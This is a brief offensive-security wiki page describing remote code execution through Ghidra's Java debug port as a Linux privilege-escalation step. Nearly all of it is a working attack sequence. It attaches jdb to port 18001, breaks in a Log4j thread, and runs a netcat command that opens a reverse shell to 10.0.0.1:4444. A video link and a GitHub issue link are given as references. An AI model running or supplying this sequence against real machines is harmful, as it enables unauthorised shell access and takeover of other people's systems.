OFFSEC Wiki

Ghidra Debug Mode RCE

Last modified: 2023-03-30

Linux Privilege Escalation

Exploitation

jdb -attach 127.0.0.1:18001
> classpath
> classes
Log4j2-TF-4-Scheduled-1[1] stop in org.apache.logging.log4j.core.util.WatchManager$WatchRunnable.run()
Log4j2-TF-4-Scheduled-1[1] print new java.lang.Runtime().exec("nc 10.0.0.1 4444 -e /bin/sh")

References

  • https://www.youtube.com/watch?v=N3VcWIUpgfE
  • https://github.com/NationalSecurityAgency/ghidra/issues/6
